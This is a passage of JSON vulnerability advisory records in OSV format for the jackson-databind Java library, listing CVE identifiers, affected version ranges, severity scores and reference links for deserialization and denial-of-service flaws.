"https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.12.6" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.13.1" }, { "type": "WEB", "url": "https://groups.google.com/g/jackson-user/c/OsBsirPM_Vw" } ], "database_specific": { "cwe_ids": [ "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2023-03-20T21:14:14Z", "nvd_published_at": "2023-03-18T22:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4gq5-ch57-c2mg", "published": "2019-01-04T19:09:49Z", "modified": "2024-03-15T05:20:21.411726Z", "aliases": [ "CVE-2018-14719" ], "summary": "Arbitrary Code Execution in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.7, 2.8.11.3, and 2.7.9.5 might allow remote attackers to execute arbitrary code by leveraging failure to block the blaze-ds-opt and blaze-ds-core classes from polymorphic deserialization.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.7" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-4gq5-ch57-c2mg/GHSA-4gq5-ch57-c2mg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", 
"2.8.11.2", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-4gq5-ch57-c2mg/GHSA-4gq5-ch57-c2mg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.7.9.5" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-4gq5-ch57-c2mg/GHSA-4gq5-ch57-c2mg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-14719" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2097" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44" }, { "type": "WEB", "url": 
"https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1797" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0877" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:0959" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:58:21Z", "nvd_published_at": "2019-01-02T18:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4w82-r329-3q67", "published": "2020-03-04T20:52:14Z", "modified": "2024-03-16T05:18:54.922179Z", "aliases": [ "CVE-2020-8840" ], "summary": "Deserialization of Untrusted Data in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.6.7.4, 2.7.x before 2.7.9.7, 2.8.x before 2.8.11.5 and 2.9.x before 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.4" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", 
"2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.7.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/03/GHSA-4w82-r329-3q67/GHSA-4w82-r329-3q67.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.7" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.6", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/03/GHSA-4w82-r329-3q67/GHSA-4w82-r329-3q67.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.4", "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/03/GHSA-4w82-r329-3q67/GHSA-4w82-r329-3q67.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.3" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/03/GHSA-4w82-r329-3q67/GHSA-4w82-r329-3q67.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8840" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2620" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/74aba4042fce35ee0b91bd2847e788c10040d78b" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/9bb52c7122271df75435ec7e66ecf6b02b1ee14f" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra275f29615f35d5b40106d1582a41e5388b2a5131564e9e01a572987@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rac5ee5d686818be7e7c430d35108ee01a88aae54f832d32f62431fd1@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb43f9a65150948a6bebd3cb77ee3e105d40db2820fd547528f4e7f89@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rb5eedf90ba3633e171a2ffdfe484651c9490dc5df74c8a29244cbc0e@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb73708bf714ed6dbc1212da082e7703e586077f0c92f3940b2e82caf@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb99c7321eba5d4c907beec46675d52827528b738cfafd48eb4d862f1@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc717fd6c65190f4e592345713f9ef0723fb7d71f624caa2a17caa26a@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcc72b497e3dff2dc62ec9b89ceb90bc4e1b14fc56c3c252a6fcbb013@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdea588d4a0ebf9cb7ce8c3a8f18d0d306507c4f8ba178dd3d20207b8@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf311f13e6356297e0ffe74397fdd25a3687b0a16e687c3ff5b834d8@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf8d389271a291dde3b2f99c36918d6cb1e796958af626cc140fee23@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re7326b8655eab931f2a9ce074fd9a1a51b5db11456bee9b48e1e170c@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re8ae2670ec456ef1c5a2a661a2838ab2cd00e9efa1e88c069f546f21@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf28ab6f224b48452afd567dfffb705fbda0fdbbf6535f6bc69d47e91@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", 
"url": "https://lists.apache.org/thread.html/rfc1ccfe89332155b72ce17f13a2701d3e7b9ec213324ceb90e79a28a@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200327-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r078e68a926ea6be12e8404e47f45aabf04bb4668e8265c0de41db6db@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1c09b9551f6953dbeca190a4c4b78198cdbb9825fce36f96fe3d8218@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1efc776fc6ce3387593deaa94bbdd296733b1b01408a39c8d1ab9e0e@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2fa8046bd47fb407ca09b5107a80fa6147ba4ebe879caae5c98b7657@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r319f19c74e06c201b9d4e8b282a4e4b2da6dcda022fb46f007dd00d3@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3539bd3a377991217d724879d239e16e86001c54160076408574e1da@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3d20a2660b36551fd8257d479941782af4a7169582449fac1704bde2@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r428d068b2a4923f1a5a4f5fc6381b95205cfe7620169d16db78e9c71@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r446646c5588b10f5e02409ad580b12f314869009cdfbf844ca395cec@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46bebdeb59b8b7212d63a010ca445a9f5c4e9d64dcf693cab6f399d3@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5d8bea8e9d17b6efcf4a0e4e194e91ef46a99f505777a31a60da2b38@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r65ee95fa09c831843bac81eaa582fdddc2b6119912a72d1c83a9b882@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6fdd4c61a09a0c89f581b4ddb3dc6f154ab0c705fcfd0a7358b2e4e5@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7762d69e85c58d6948823424017ef4c08f47de077644277fa18cc116@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7e5c10534ed06bf805473ac85e8412fe3908a8fa4cabf5027bf11220@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8170007fd9b263d65b37d92a7b5d7bc357aedbb113a32838bc4a9485@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8e96c340004b7898cad3204ea51280ef6e4b553a684e1452bf1b18b1@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r94930e39b60fff236160c1c4110fe884dc093044b067aa5fc98d7ee1@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9e59ebaf76fd00b2fa3ff5ebf18fe075ca9f4376216612c696f76718@%3Cdev.ranger.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9ecf211c22760b00967ebe158c6ed7dba9142078e2a630ab8904a5b7@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200610-01-fastjason-en" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], 
"github_reviewed": true, "github_reviewed_at": "2020-02-25T20:56:51Z", "nvd_published_at": "2020-02-10T21:56:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-57j2-w4cx-62h2", "published": "2022-03-12T00:00:36Z", "modified": "2024-10-22T05:29:08.356656Z", "aliases": [ "CGA-mh4f-39hj-cv5p", "CVE-2020-36518" ], "related": [ "CGA-449j-52qq-cgj7", "CGA-f5fm-pjmq-gwc9", "CGA-hm6h-h5gf-mh6h" ], "summary": "Deeply nested json in jackson-databind", "details": "jackson-databind is a data-binding package for the Jackson Data Processor. jackson-databind allows a Java stack overflow exception and denial of service via a large depth of nested objects.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.13.0" }, { "fixed": "2.13.2.1" } ] } ], "versions": [ "2.13.0", "2.13.1", "2.13.2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.13.2.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-57j2-w4cx-62h2/GHSA-57j2-w4cx-62h2.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.12.6.1" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.10.0", "2.10.0.pr1", "2.10.0.pr2", "2.10.0.pr3", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5", "2.10.5.1", "2.11.0", "2.11.0.rc1", "2.11.1", "2.11.2", "2.11.3", "2.11.4", "2.12.0", "2.12.0-rc1", "2.12.0-rc2", "2.12.1", "2.12.2", "2.12.3", 
"2.12.4", "2.12.5", "2.12.6", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.10.8", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.12.6.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/03/GHSA-57j2-w4cx-62h2/GHSA-57j2-w4cx-62h2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36518" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2816" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/0a8157c6ca478b1bc7be4ba7dccdb3863275f0de" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/3cc52f82ecf943e06c1d7c3b078e405fb3923d2b" }, { "type": "WEB", "url": 
"https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/b3587924ee5d8695942f364d0d404d48d0ea6126" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.12" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.13" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00001.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220506-0004" }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5283" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ], "database_specific": { "cwe_ids": [ "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-03-22T14:36:44Z", "nvd_published_at": "2022-03-11T07:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-58pp-9c76-5625", "published": "2020-06-10T21:12:41Z", "modified": "2024-02-16T07:55:08.550842Z", "aliases": [ "CVE-2020-11112" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.proxy.provider.remoting.RmiProvider (aka apache/commons-proxy).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", 
"ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-58pp-9c76-5625/GHSA-58pp-9c76-5625.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11112" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2666" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200403-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-10T21:11:14Z", "nvd_published_at": "2020-03-31T05:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5949-rw7g-wx7w", "published": "2021-01-20T21:20:15Z", "modified": 
